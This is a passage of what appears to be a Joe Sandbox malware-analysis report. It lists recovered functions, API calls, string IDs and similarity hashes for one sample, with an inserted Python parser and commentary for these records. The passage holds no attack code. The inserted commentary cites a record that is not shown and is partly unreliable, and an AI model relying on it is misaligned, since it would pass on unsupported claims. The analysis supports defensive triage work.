• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: abort$CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 2889003569-2084237596
• Opcode ID: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
• Instruction ID: 20821787b7262c31e17f61ab3869007bef28896b5524f6856da76abcf6feba25
• Opcode Fuzzy Hash: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
• Instruction Fuzzy Hash: CA91C473A087819AEB10DFA5E8903AEBBA0FB44788F54413AEE4D17B54DF39D195CB00
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
• Instruction ID: 76d97e68d5d9db2b4679c46b737e26e0236949375a6b93a84f8cee27d87b0a73
• Opcode Fuzzy Hash: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
• Instruction Fuzzy Hash: 1C51E633A0960297EB58EF11EC14A2AB795FF44B99F918030DE0E47748DF3AE841C720
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: Window$Show$Rect
• String ID: RarHtmlClassName
• API String ID: 2396740005-1658105358
• Opcode ID: 500699e0308efecee35f99f9c80279572e1dadfe036f1821013dd5e6272eb3e2
• Instruction ID: 6f661788161054a14056136e9d80b3980457cf707052ac36a76eceabc88b2c4e
• Opcode Fuzzy Hash: 500699e0308efecee35f99f9c80279572e1dadfe036f1821013dd5e6272eb3e2
• Instruction Fuzzy Hash: 8A517036A087869AEA34EB25E95437AF760FF85B84F844131DE8E43B65CF3DE8058750
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
• String ID: sfxcmd$sfxpar
• API String ID: 3540648995-3493335439
• Opcode ID: c87641128664e101c09a05c68e21ac71321faf5786322f88757a9baac3bb3a7c
• Instruction ID: a66ab8871189825d0c63a3ad0ecd91166574b1bdc329c1ef0319a332837636bf
• Opcode Fuzzy Hash: c87641128664e101c09a05c68e21ac71321faf5786322f88757a9baac3bb3a7c
• Instruction Fuzzy Hash: 5031AF22E14B46A4EB00AB69EC941ADA371EF48B98F840136DE1D17BA8CF3DD081C360
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID:
• String ID: RENAMEDLG$REPLACEFILEDLG
• API String ID: 0-56093855
• Opcode ID: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
• Instruction ID: 3c114b389104b3afc0fbdc48cf4a992a9048dca4eeb399cf7bc0fbfbffbbeeb3
• Opcode Fuzzy Hash: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
• Instruction Fuzzy Hash: A021F831A0CA8BA1EA10AB6AFC542B5E3A1FF45B88FD40536C98D47364DF3DE595C320
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
• Instruction ID: d9ca7058bc2867432d1192147328da94a4d96227a616037b281cdad4ff56ccd6
• Opcode Fuzzy Hash: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
• Instruction Fuzzy Hash: 32F04F21B1DB4291EF64AB11F894379A760EF88B90F98503AE94F87664DF7CD584C720
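The records above are what the Joe Sandbox IDA plugin emits per recovered function: the API calls it observed with their dump addresses, the memory dump the code was lifted from, and a Similarity block whose API ID, String ID, Opcode ID and fuzzy-hash fields are the values an analyst pivots on across samples. The Python below is an editor's added example, not part of this report and not Joe Sandbox tooling. It parses that layout into records, converts the absolute `ref:` addresses into RVAs against the stated image base so they can be looked up in the static PE, flags functions that resolve imports at run time (GetModuleHandle*/LoadLibrary* paired with GetProcAddress, as in the AcquireSRWLockExclusive/ReleaseSRWLockExclusive record above), and keeps a trailing record that is cut off before its Instruction Fuzzy Hash instead of silently dropping it. The embedded sample is three records copied from this page with the Associated and Snapshot lines removed; the layout rules, function names and the "dynamic resolution" heuristic are the example's own assumptions.

```python
# Editor's example: parser for Joe Sandbox IDA-plugin function records (not Joe Sandbox code).
import re
from dataclasses import dataclass, field

# Section headers assumed from the report layout; a record closes at 'Instruction Fuzzy Hash'.
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_CALL = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE = re.compile(r"^Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")

# Sample copied from the report above (Associated/Snapshot lines dropped); the last
# record is deliberately truncated before its Instruction Fuzzy Hash, as on the page.
SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(?,?,?,00007FF70ECF5003,?,?,?,00007FF70ECF53BA), ref: 00007FF70ECF50BB
• GetProcAddress.KERNEL32(?,?,?,00007FF70ECF5003,?,?,?,00007FF70ECF53BA), ref: 00007FF70ECF50D8
• GetProcAddress.KERNEL32(?,?,?,00007FF70ECF5003,?,?,?,00007FF70ECF53BA), ref: 00007FF70ECF50F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
• Instruction Fuzzy Hash: DB115E20B1DB03A2FD61AB11BD50276D2A2AF19781FC96435DA5D47794EF7DB8848330
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
Similarity
• API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
• String ID: sfxcmd$sfxpar
• API String ID: 3540648995-3493335439
• Opcode ID: c87641128664e101c09a05c68e21ac71321faf5786322f88757a9baac3bb3a7c
• Instruction Fuzzy Hash: 5031AF22E14B46A4EB00AB69EC941ADA371EF48B98F840136DE1D17BA8CF3DD081C360
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
"""


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int  # absolute address of the call site in the dump


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    image_base: int = 0
    based_on_pe: bool = False
    similarity: dict = field(default_factory=dict)  # raw 'Key: value' pairs
    complete: bool = False  # False when cut off before 'Instruction Fuzzy Hash'

    def _split(self, key):  # '$'-separated lists, empty value -> []
        return [s for s in self.similarity.get(key, "").split("$") if s]

    @property
    def api_ids(self):
        return self._split("API ID")

    @property
    def string_ids(self):
        return self._split("String ID")


def parse_records(text):
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
        elif line.startswith("•"):
            body = line[1:].strip()
            if section == "APIs" and (m := API_CALL.match(body)):
                cur.apis.append(ApiCall(m["name"], m["module"], int(m["ref"], 16)))
            elif section == "Memory Dump Source" and (m := SOURCE.match(body)):
                cur.source_file, cur.image_base = m["file"], int(m["off"], 16)
                cur.based_on_pe = m["pe"] == "true"
            elif section == "Similarity":
                key, _, value = body.partition(":")
                cur.similarity[key.strip()] = value.strip()
                if key.strip() == "Instruction Fuzzy Hash":  # last field of a record
                    cur.complete = True
                    records.append(cur)
                    cur, section = FunctionRecord(), None
    if cur.apis or cur.similarity:  # trailing record truncated by the page break
        records.append(cur)
    return records


def rva(rec, call):
    """Dump address -> RVA against the record's image base, for static pivoting."""
    return call.ref - rec.image_base


def resolves_imports_at_runtime(rec):
    """Heuristic: GetProcAddress next to GetModuleHandle*/LoadLibrary* in one function."""
    names = {a.name for a in rec.apis}
    return "GetProcAddress" in names and any(
        n.startswith(("GetModuleHandle", "LoadLibrary")) for n in names)


def records_with_string(records, needle):
    needle = needle.lower()
    return [r for r in records if any(needle in s.lower() for s in r.string_ids)]


if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r.similarity.get("Opcode ID", "?")[:12], r.api_ids, r.string_ids,
              "dynamic-resolve" if resolves_imports_at_runtime(r) else "",
              "" if r.complete else "TRUNCATED", [hex(rva(r, c)) for c in r.apis])
```

Feed it the whole exported report rather than the sample and the String ID filter is the quickest way to find the functions carrying sfxcmd/sfxpar, RarHtmlClassName and RENAMEDLG/REPLACEFILEDLG, which are strings carried by WinRAR's SFX module (an analyst inference, not a statement the report makes); the Opcode ID of each hit is then the value to search for in other reports.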
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
• String ID:
• API String ID: 3659116390-0
APIs
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
APIs
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
APIs
Strings
Similarity
• API ID: __except_validate_context_recordabort
• String ID: csm$csm
• API String ID: 746414643-3733052814
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: $*
• API String ID: 3215553584-3982473090
APIs
Strings
Similarity
• API ID: CreateFrameInfo__except_validate_context_recordabort
• String ID: csm
• API String ID: 2466640111-1018135373
APIs
Strings
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: U
• API String ID: 2456169464-4171548499
                                                                                                                                                                          • Opcode ID: d20302cc878b90de32ea97a9ef5a303d772ca5a33c3583031ee23a301797e927
                                                                                                                                                                          • Instruction ID: ceca512d60750a98db0198f2d0342dfdcf635d9df798a318473f74de6a6f3c53
                                                                                                                                                                          • Opcode Fuzzy Hash: d20302cc878b90de32ea97a9ef5a303d772ca5a33c3583031ee23a301797e927
                                                                                                                                                                          • Instruction Fuzzy Hash: 0141A522B19A4592E720AF25F8443BAB761FB88794F854032EE8D8B784DF3CE541C750
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ObjectRelease
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1429681911-3916222277
                                                                                                                                                                          • Opcode ID: 617a757d8815b9cd64aff0be7c79d33489404464c5a4c9318e7e7076e56f3154
                                                                                                                                                                          • Instruction ID: 1939a49cbd80c54f19a789b0597042269915a315080764277be0f19fbc55c6ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 617a757d8815b9cd64aff0be7c79d33489404464c5a4c9318e7e7076e56f3154
                                                                                                                                                                          • Instruction Fuzzy Hash: B2314A36B1874686DA04AF26BD1876AB7A1FB89FD1F904135ED8A43B24CF3CD4498B00
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDeviceRelease
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 127614599-3916222277
                                                                                                                                                                          • Opcode ID: a4f30ad7dfa2e76a7ae327bbc05fad838edf44ef71ac395416f8be742774f962
                                                                                                                                                                          • Instruction ID: 7481513c9831b6bbf62ba5c9e8fd67b6496d184a90563ecc7025492ef49cb00d
                                                                                                                                                                          • Opcode Fuzzy Hash: a4f30ad7dfa2e76a7ae327bbc05fad838edf44ef71ac395416f8be742774f962
                                                                                                                                                                          • Instruction Fuzzy Hash: 36E0C231F0864582EB4867BAFA8913AA261EF4CBD0F954035DA0E83795DF3DC8C54300
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FoldString_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2025052027-0
                                                                                                                                                                          • Opcode ID: 6885311f977ff8b5915e7910640fa07167ed4e933460e8e7d633901c21ad58a3
                                                                                                                                                                          • Instruction ID: 4a75cbd6455bd7f07b510d3a492a2e993fcd7c6a337c02f0a629d77fdc55a904
                                                                                                                                                                          • Opcode Fuzzy Hash: 6885311f977ff8b5915e7910640fa07167ed4e933460e8e7d633901c21ad58a3
                                                                                                                                                                          • Instruction Fuzzy Hash: DFB1C222F2C746A1EA10AB19D84866EA3A1FF44BA4FD58537DA1D07794DF7FE490C320
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                          • Opcode ID: 318763212630b9f8aa6bd02c91178889ead5250ce24bd63f2b84e46bdd677746
                                                                                                                                                                          • Instruction ID: 2b42adc45f080ab18db16af74a6de3ad256bd84a9799f0e0dacdbc4c472272a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 318763212630b9f8aa6bd02c91178889ead5250ce24bd63f2b84e46bdd677746
                                                                                                                                                                          • Instruction Fuzzy Hash: 5751A662B18B82A5EB00FB74D8542EDA321FF85B88F804136DA5D57B96DF3AD544C350
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1077098981-0
                                                                                                                                                                          • Opcode ID: 5e20d32f705fb8afae232702789ae5b6ccc28567c60846b1c728c17defa930fd
                                                                                                                                                                          • Instruction ID: dc00c152a0baabc754f4602a83c9b7e880530b58138f49b6adef4445bff95aeb
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e20d32f705fb8afae232702789ae5b6ccc28567c60846b1c728c17defa930fd
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E51A032A18B4296E710AF21E8447AEB7B4FF88B88F901035EA4E57B58DF3DD544CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4141327611-0
                                                                                                                                                                          • Opcode ID: 8d9a5625d90a928a2b0668c470320c834cfc61c5ffddc2be44e89749fafbb7da
                                                                                                                                                                          • Instruction ID: 682238ad215c0676da8f31f2e4d2b9db3ef6da9e6077f2c53774b671cc729a8d
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d9a5625d90a928a2b0668c470320c834cfc61c5ffddc2be44e89749fafbb7da
                                                                                                                                                                          • Instruction Fuzzy Hash: 7241C621E0E74246FB69BB11D8503B9E6A0EF84B90F9C4130DA9D87AD5CF3CDD418721
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF70ECFF93B), ref: 00007FF70ED04021
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF70ECFF93B), ref: 00007FF70ED04083
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF70ECFF93B), ref: 00007FF70ED040BD
                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF70ECFF93B), ref: 00007FF70ED040E7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
  • API ID: ByteCharEnvironmentMultiStringsWide$Free
  • String ID:
  • API String ID: 1557788787-0
  • Opcode ID: 6509991160e12f712ad6d4b27e048ebbd13574e2c5e48816f306a01bcccb75f3
  • Instruction ID: 8e6baa2666b595bee4556cfa22545e87e0ebe742ce5f622e167d87a37cd9a11b
  • Opcode Fuzzy Hash: 6509991160e12f712ad6d4b27e048ebbd13574e2c5e48816f306a01bcccb75f3
  • Instruction Fuzzy Hash: FD216121F0879685E620AF12A84062AF6A5FF44BD0B8C4135DF9EB3BD4DF3CE9528710
APIs
  • GetLastError.KERNEL32(?,?,?,00007FF70ECFB380,?,?,00000050,00007FF70ECFD3C1), ref: 00007FF70ED0095A
  • SetLastError.KERNEL32(?,?,?,00007FF70ECFB380,?,?,00000050,00007FF70ECFD3C1), ref: 00007FF70ED009C2
  • SetLastError.KERNEL32(?,?,?,00007FF70ECFB380,?,?,00000050,00007FF70ECFD3C1), ref: 00007FF70ED009D8
  • abort.LIBCMT ref: 00007FF70ED009DE
Memory Dump Source
  • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
  • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
